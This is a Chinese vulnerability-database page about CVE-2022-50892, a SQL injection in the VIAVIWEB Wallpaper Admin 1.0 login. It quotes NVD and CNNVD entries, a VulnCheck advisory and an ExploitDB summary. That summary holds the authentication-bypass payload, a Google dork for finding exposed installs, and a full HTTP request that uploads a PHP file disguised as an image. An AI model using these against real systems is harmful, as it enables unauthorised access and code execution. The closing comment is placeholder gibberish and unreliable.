一、 漏洞 CVE-2022-50892 基础信息
漏洞信息
# VIAVIWEB 壁纸管理SQL注入漏洞
N/A
神龙判断
是否为 Web 类漏洞: 未知
判断理由:
N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page
来源:美国国家漏洞数据库 NVD
漏洞描述信息
VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
SQL命令中使用的特殊元素转义处理不恰当(SQL注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
VIAVIWEB Wallpaper Admin SQL注入漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
VIAVIWEB Wallpaper Admin是印度VIAVIWEB公司的一个移动应用后台管理系统。 VIAVIWEB Wallpaper Admin 1.0版本存在SQL注入漏洞,该漏洞源于登录凭据存在SQL注入漏洞,可能导致绕过身份验证。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
SQL注入
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50892 的公开POC
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
三、漏洞 CVE-2022-50892 的情报信息
- https://www.viaviweb.comproduct
标题: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - PHP webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:## 关键漏洞信息 - **EDB-ID:** 51033 - **CVE:** N/A - **Author:** EDD13MORA - **Type:** WEBAPPS - **Platform:** PHP - **Date:** 2023-03-22 - **Vulnerable App:** VIAVIWEB Wallpaper Admin 1.0 ## 漏洞详情 - **Exploit Title:** VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - **Google Dork:** intext:"Wallpaper Admin" "LOGIN" "password" "Username" - **Date:** 18/09/2022 - **Exploit Author:** Edd13Mora - **Vendor Homepage:** www.viaviweb.com - **Version:** N/A - **Tested on:** Windows 11 - Kali Linux ### 漏洞描述 - **SQL Injection on the Login Page** - `payload --> admin' or 1=1-- -` ### Proof of Concept (POC) ```http POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2 Host: http://googlezik.freehostia.com Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jd8oraed4o52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------33893919268150571572221367848 Content-Length: 467 Origin: http://googlezik.freehostia.com Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="category_id" 1 --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="image[]"; filename="poc.php" Content-Type: image/png <?php phpinfo(); ?> --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="submit" --------------------------33893919268150571572221367848-- ``` ### 上传文件位置 - `http://localhost/PAth-Where-Script-Installed/categories/`
标题: VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:- **Severity**: High - **Date**: January 13, 2026 - **Affecting**: VIAVIWEB Wallpaper Admin 1.0 - **CVE**: CVE-2022-50892 - **CWE**: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL injection') - **CVSSv3**: 9.1 (AV:N/AC:L/PR:N/UI:N/SC:H/CI:H/IA:H) - **References**: - [ExploitDB-51033](#) - [Vendor Homepage](#) - **Credit**: [Edd13Mora] - **Description**: VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface.
- https://nvd.nist.gov/vuln/detail/CVE-2022-50892
四、漏洞 CVE-2022-50892 的评论
匿名用户
2026-01-15 06:08:43Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.